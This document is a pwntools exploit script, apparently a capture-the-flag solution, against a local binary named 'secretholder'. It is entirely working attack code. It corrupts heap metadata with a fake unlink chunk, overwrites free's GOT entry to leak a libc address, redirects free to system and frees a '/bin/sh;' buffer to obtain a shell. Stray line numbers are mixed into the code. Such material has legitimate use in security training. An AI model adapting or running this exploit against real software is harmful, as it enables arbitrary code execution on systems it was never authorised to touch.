  1. from pwn import *
  2.  
def keep(idx, data):
    """Drive menu option 1 ("keep") on the module-level tube ``p``.

    Waits for the menu to finish printing, chooses option 1, answers the
    follow-up prompt (which ends in '3. Huge secret', so *idx* presumably
    selects a slot/size class -- confirm against the binary) with ``str(idx)``,
    discards one line, then sends *data* with a trailing newline.
    """
    tube = p
    choice, slot = '1', str(idx)
    tube.recvuntil('3. Renew secret')
    tube.sendline(choice)
    tube.recvuntil('3. Huge secret')
    tube.sendline(slot)
    tube.recvline()
    tube.sendline(data)
  10.  
def wipe(idx):
    """Drive menu option 2 ("wipe") on the module-level tube ``p``.

    Waits for the menu, chooses option 2, and answers the slot prompt
    with ``str(idx)``.  No further input is sent.
    """
    tube = p
    choice, slot = '2', str(idx)
    tube.recvuntil('3. Renew secret')
    tube.sendline(choice)
    tube.recvuntil('3. Huge secret')
    tube.sendline(slot)
  16.  
def renew(idx, data):
    """Drive menu option 3 ("renew") on the module-level tube ``p``.

    Waits for the menu, chooses option 3, answers the slot prompt with
    ``str(idx)``, discards one line, then writes *data* with ``send`` --
    unlike ``keep``, no newline is appended, so the raw bytes go out as-is.
    """
    tube = p
    choice, slot = '3', str(idx)
    tube.recvuntil('3. Renew secret')
    tube.sendline(choice)
    tube.recvuntil('3. Huge secret')
    tube.sendline(slot)
    tube.recvline()
    tube.send(data)
  24.  
if __name__ == '__main__':
    # Spawn the local challenge binary; keep/wipe/renew above read this
    # module-level tube.
    p = process("./secretholder")
    context.log_level='debug'
    # Fixed addresses for this exact build: a target in the binary's data
    # area, free's GOT slot, and the puts PLT stub.
    # NOTE(review): these only hold for a non-PIE binary whose GOT is
    # writable at run time (i.e. not full RELRO); either mitigation would
    # invalidate the hard-coded values -- confirm against the ELF headers.
    addr = 0x6020a8
    free_got = 0x602018
    puts_plt = 0x4006c0

    # Take three slots, then release all of them.
    keep(1,'AAAA')
    keep(2,'AAAA')
    keep(3,'AAAA')

    wipe(1)
    wipe(2)
    wipe(3)

    # Re-take slot 3, release slot 1 again, then re-take slots 1 and 2.
    # The order is deliberate: it arranges the allocator state that the
    # renew/wipe steps below depend on (presumably leaving slot 3
    # overlapping the others -- not verifiable from this script alone).
    keep(3,'AAAA')

    wipe(1)

    keep(1,'AAAA')
    keep(2,'AAAA')

    # 32 bytes: zero word, size field 0x21, then two pointers just below addr.
    fake_chunk = p64(0) + p64(0x21) + p64(addr - 0x18) + p64(addr - 0x10)

    # Filler laid out as 0x90-sized pieces following the fake header.
    junk = p64(0x20) + p64(0x90) + "A"*128 + p64(0x90) + p64(0x91) + "A"*128 + p64(0x90) + p64(0x91)

    # Write the crafted layout through slot 3, pause briefly, free slot 2.
    renew(3,fake_chunk + junk)
    sleep(0.2)
    wipe(2)

    # Write 32 bytes through slot 3 ending in free_got - 0x10.
    renew(3, p64(0)*3 + p64(free_got - 0x10))

    # Second write through slot 3: 16 zero bytes then puts_plt, i.e. the
    # value lands at offset 0x10 from free_got - 0x10 -- exactly free_got.
    renew(3, p64(0)*2 + p64(puts_plt))

    # Marker string in slot 1 (exactly 16 bytes), then free it.
    renew(1,'/bin/sh;' + "A"*8)

    wipe(1)

    # Skip the echoed marker; the next 6 bytes are taken as a pointer and
    # zero-padded to 8 bytes for u64.  The `[0:]` slice is a no-op.
    p.recvuntil("/bin/sh;" + "A"*8)
    leak = u64(p.recv(6)[0:].ljust(8,'\x00'))
    print "[+] Leak : 0x%x" % leak
    # Fixed offsets from the leaked value; specific to the libc build the
    # author ran against, so this line is not portable across systems.
    system = leak - 0x3be7b8 + 0x45390 - 0x63c0

    # Same 16-zero-bytes-then-pointer shape as the puts_plt write above,
    # now carrying the computed system address; then free slot 1 again.
    renew(3, p64(0)*2 + p64(system))

    wipe(1)

    p.interactive()